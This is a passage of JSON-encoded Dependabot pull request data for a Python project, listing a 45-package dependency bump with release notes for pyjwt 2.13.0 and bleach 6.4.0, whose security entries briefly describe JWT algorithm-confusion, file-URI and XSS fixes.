href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=pip\u0026previous-version=2.12.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/puente-platform/puente-ai/pull/90","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/puente-platform%2Fpuente-ai/issues/90","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/90/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-09T00:38:36.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4617726976","node_id":"PR_kwDOP4uxx87kJ4a4","number":190,"state":"open","title":"chore(deps): bump the all-dependencies group across 1 directory with 45 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-09T00:38:36.000Z","updated_at":"2026-06-09T00:39:12.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"all-dependencies","update_count":45,"packages":[{"name":"beautifulsoup4","old_version":"4.14.3","new_version":"4.15.0"},{"name":"bleach","old_version":"6.3.0","new_version":"6.4.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"click","old_version":"8.3.2","new_version":"8.4.1","repository_url":"https://github.com/pallets/click"},{"name":"debugpy","old_version":"1.8.20","new_version":"1.8.21","repository_url":"https://github.com/microsoft/debugpy"},{"name":"decorator","old_version":"5.2.1","new_version":"5.3.1","repository_url":"https://github.com/micheles/decorator"},{"name":"docstring-parser","old_version":"0.17.0","new_version":"0.18.0","repository_url":"https://github.com/rr-/docstring_parser"},{"name":"fastapi","old_version":"0.135.3","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"fonttools","old_version":"4.62.1","new_version":"4.63.0","repository_url":"https://github.com/fonttools/fonttools"},{"name":"httptools","old_version":"0.7.1","new_version":"0.8.0","repository_url":"https://github.com/MagicStack/httptools"},{"name":"idna","old_version":"3.11","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"ipython","old_version":"9.12.0","new_version":"9.14.1","repository_url":"https://github.com/ipython/ipython"},{"name":"jedi","old_version":"0.19.2","new_version":"0.20.0","repository_url":"https://github.com/davidhalter/jedi"},{"name":"jiter","old_version":"0.14.0","new_version":"0.15.0","repository_url":"https://github.com/pydantic/jiter"},{"name":"jupyter-events","old_version":"0.12.0","new_version":"0.12.1","repository_url":"https://github.com/jupyter/jupyter_events"},{"name":"jupyter-client","old_version":"8.8.0","new_version":"8.9.0","repository_url":"https://github.com/jupyter/jupyter_client"},{"name":"jupyter-server","old_version":"2.17.0","new_version":"2.19.0","repository_url":"https://github.com/jupyter-server/jupyter_server"},{"name":"jupyterlab","old_version":"4.5.6","new_version":"4.5.8","repository_url":"https://github.com/jupyterlab/jupyterlab"},{"name":"matplotlib","old_version":"3.10.8","new_version":"3.10.9","repository_url":"https://github.com/matplotlib/matplotlib"},{"name":"matplotlib-inline","old_version":"0.2.1","new_version":"0.2.2","repository_url":"https://github.com/ipython/matplotlib-inline"},{"name":"mistune","old_version":"3.2.0","new_version":"3.2.1","repository_url":"https://github.com/lepture/mistune"},{"name":"nbclient","old_version":"0.10.4","new_version":"0.11.0","repository_url":"https://github.com/jupyter/nbclient"},{"name":"notebook","old_version":"7.5.5","new_version":"7.5.7","repository_url":"https://github.com/jupyter/notebook"},{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"parso","old_version":"0.8.6","new_version":"0.8.7","repository_url":"https://github.com/davidhalter/parso"},{"name":"platformdirs","old_version":"4.9.6","new_version":"4.10.0","repository_url":"https://github.com/tox-dev/platformdirs"},{"name":"postgrest","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"praw","old_version":"7.8.1","new_version":"7.8.2","repository_url":"https://github.com/praw-dev/praw"},{"name":"psycopg2-binary","old_version":"2.9.11","new_version":"2.9.12","repository_url":"https://github.com/psycopg/psycopg2"},{"name":"pydantic","old_version":"2.13.0","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pydantic-core","old_version":"2.46.0","new_version":"2.47.0","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"realtime","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"scikit-learn","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"soupsieve","old_version":"2.8.3","new_version":"2.8.4","repository_url":"https://github.com/facelessuser/soupsieve"},{"name":"storage3","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"supabase","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"supabase-auth","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"supabase-functions","old_version":"2.28.3","new_version":"2.31.0","repository_url":"https://github.com/supabase/supabase-py"},{"name":"tornado","old_version":"6.5.5","new_version":"6.5.7","repository_url":"https://github.com/tornadoweb/tornado"},{"name":"traitlets","old_version":"5.14.3","new_version":"5.15.1","repository_url":"https://github.com/ipython/traitlets"},{"name":"urllib3","old_version":"2.6.3","new_version":"2.7.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"watchfiles","old_version":"1.1.1","new_version":"1.2.0","repository_url":"https://github.com/samuelcolvin/watchfiles"},{"name":"wcwidth","old_version":"0.6.0","new_version":"0.8.1","repository_url":"https://github.com/jquast/wcwidth"}],"path":null,"ecosystem":"pip"},"body":"Bumps the all-dependencies group with 45 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [beautifulsoup4](https://www.crummy.com/software/BeautifulSoup/bs4/) | `4.14.3` | `4.15.0` |\n| [bleach](https://github.com/mozilla/bleach) | `6.3.0` | `6.4.0` |\n| [click](https://github.com/pallets/click) | `8.3.2` | `8.4.1` |\n| [debugpy](https://github.com/microsoft/debugpy) | `1.8.20` | `1.8.21` |\n| [decorator](https://github.com/micheles/decorator) | `5.2.1` | `5.3.1` |\n| [docstring-parser](https://github.com/rr-/docstring_parser) | `0.17.0` | `0.18.0` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.135.3` | `0.136.3` |\n| [fonttools](https://github.com/fonttools/fonttools) | `4.62.1` | `4.63.0` |\n| [httptools](https://github.com/MagicStack/httptools) | `0.7.1` | `0.8.0` |\n| [idna](https://github.com/kjd/idna) | `3.11` | `3.18` |\n| [ipython](https://github.com/ipython/ipython) | `9.12.0` | `9.14.1` |\n| [jedi](https://github.com/davidhalter/jedi) | `0.19.2` | `0.20.0` |\n| [jiter](https://github.com/pydantic/jiter) | `0.14.0` | `0.15.0` |\n| [jupyter-events](https://github.com/jupyter/jupyter_events) | `0.12.0` | `0.12.1` |\n| [jupyter-client](https://github.com/jupyter/jupyter_client) | `8.8.0` | `8.9.0` |\n| [jupyter-server](https://github.com/jupyter-server/jupyter_server) | `2.17.0` | `2.19.0` |\n| [jupyterlab](https://github.com/jupyterlab/jupyterlab) | `4.5.6` | `4.5.8` |\n| [matplotlib](https://github.com/matplotlib/matplotlib) | `3.10.8` | `3.10.9` |\n| [matplotlib-inline](https://github.com/ipython/matplotlib-inline) | `0.2.1` | `0.2.2` |\n| [mistune](https://github.com/lepture/mistune) | `3.2.0` | `3.2.1` |\n| [nbclient](https://github.com/jupyter/nbclient) | `0.10.4` | `0.11.0` |\n| [notebook](https://github.com/jupyter/notebook) | `7.5.5` | `7.5.7` |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [parso](https://github.com/davidhalter/parso) | `0.8.6` | `0.8.7` |\n| [platformdirs](https://github.com/tox-dev/platformdirs) | `4.9.6` | `4.10.0` |\n| [postgrest](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [praw](https://github.com/praw-dev/praw) | `7.8.1` | `7.8.2` |\n| [psycopg2-binary](https://github.com/psycopg/psycopg2) | `2.9.11` | `2.9.12` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.0` | `2.13.4` |\n| [pydantic-core](https://github.com/pydantic/pydantic) | `2.46.0` | `2.47.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [realtime](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.8.0` | `1.9.0` |\n| [soupsieve](https://github.com/facelessuser/soupsieve) | `2.8.3` | `2.8.4` |\n| [storage3](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [supabase](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [supabase-auth](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [supabase-functions](https://github.com/supabase/supabase-py) | `2.28.3` | `2.31.0` |\n| [tornado](https://github.com/tornadoweb/tornado) | `6.5.5` | `6.5.7` |\n| [traitlets](https://github.com/ipython/traitlets) | `5.14.3` | `5.15.1` |\n| [urllib3](https://github.com/urllib3/urllib3) | `2.6.3` | `2.7.0` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [watchfiles](https://github.com/samuelcolvin/watchfiles) | `1.1.1` | `1.2.0` |\n| [wcwidth](https://github.com/jquast/wcwidth) | `0.6.0` | `0.8.1` |\n\n\nUpdates `beautifulsoup4` from 4.14.3 to 4.15.0\n\nUpdates `bleach` from 6.3.0 to 6.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 6.4.0 (June 5th, 2026)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eNOTE: 2026-06-05: Bleach is no longer maintained. There will be no future\nreleases including for security issues.\u003c/strong\u003e\nSee issue: \u003ccode\u003e\u0026lt;https://github.com/mozilla/bleach/issues/698\u0026gt;\u003c/code\u003e__\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDropped support for pypy 3.10. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/764\"\u003e#764\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFix bug 2023812 / GHSA-8rfp-98v4-mmr6.\u003c/p\u003e\n\u003cp\u003eFix XSS issue with sanitize_uri_value where disallowed schemes with\nUnicode invisible characters wouldn't be rejected.\u003c/p\u003e\n\u003cp\u003eFor example::\u003c/p\u003e\n\u003cp\u003eimport bleach\npayload1 = '\u003c!-- raw HTML omitted --\u003eClick\u003c!-- raw HTML omitted --\u003e'\nresult1 = bleach.clean(payload1)\nprint(repr(result1))\u003c/p\u003e\n\u003cp\u003eoutputs::\u003c/p\u003e\n\u003cp\u003e'\u003c!-- raw HTML omitted --\u003eClick\u003c!-- raw HTML omitted --\u003e'\u003c/p\u003e\n\u003cp\u003eSee the advisory for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix GHSA-gj48-438w-jh9v.\u003c/p\u003e\n\u003cp\u003eFix issue where URI sanitization wasn't happening in formaction attributes.\u003c/p\u003e\n\u003cp\u003eSee the advisory for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd support for pypy 3.11. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/764\"\u003e#764\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDrop version max in tinycss2 pin. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/772\"\u003e#772\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eThis removes one of the things we had to keep checking and updating. Users\nnow own the responsibility for correctness with the version of tinycss2\nthey're using.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/f0355a7af00500482c5292c6c83290c6a178068d\"\u003e\u003ccode\u003ef0355a7\u003c/code\u003e\u003c/a\u003e fix: fix last release date in CHANGES\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/ae4e8a26706516ad01b92e66321b480208a440da\"\u003e\u003ccode\u003eae4e8a2\u003c/code\u003e\u003c/a\u003e chore: bleach 6.4.0 and final release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/970df58e9f0c55cc52244f3f0106e473a40d886d\"\u003e\u003ccode\u003e970df58\u003c/code\u003e\u003c/a\u003e fix: uri-sanitization in formaction attributes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/7c4867c32344d1c961107fae62240a6f0dc680dc\"\u003e\u003ccode\u003e7c4867c\u003c/code\u003e\u003c/a\u003e fix: xss bypass in allowed protocol test using unicode invisible characters\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/913ab75992b845e2c9c060c41f24d46921db4693\"\u003e\u003ccode\u003e913ab75\u003c/code\u003e\u003c/a\u003e fix: reduce redundancy in workflow jobs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/218c15af455c8dec14f98fcb2e235f8680e93930\"\u003e\u003ccode\u003e218c15a\u003c/code\u003e\u003c/a\u003e fix: rework pip caching\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/4f0b097bf80548a022050e2f71f024d755a9f154\"\u003e\u003ccode\u003e4f0b097\u003c/code\u003e\u003c/a\u003e fix: fix tox platform restrictions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/e95a79d07bb5d792425c2bc0ef5dd03f6614f3bb\"\u003e\u003ccode\u003ee95a79d\u003c/code\u003e\u003c/a\u003e chore: update pytest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/91539d4e80d4685b8f2bedc79076ff0ff6c1b911\"\u003e\u003ccode\u003e91539d4\u003c/code\u003e\u003c/a\u003e Bump actions/cache from 5.0.3 to 5.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd47b4ce495859065da23c2116f651e591e1e90d\"\u003e\u003ccode\u003ecd47b4c\u003c/code\u003e\u003c/a\u003e fix: handle left-angle-bracket that's not a tag (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/733\"\u003e#733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v6.3.0...v6.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `click` from 8.3.2 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/releases\"\u003eclick's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.1 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.1/\"\u003ehttps://pypi.org/project/click/8.4.1/\u003c/a\u003e\nChanges: \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-1\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-1\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/click/milestone/32?closed=1\"\u003ehttps://github.com/pallets/click/milestone/32?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type conversion again. \u003ca 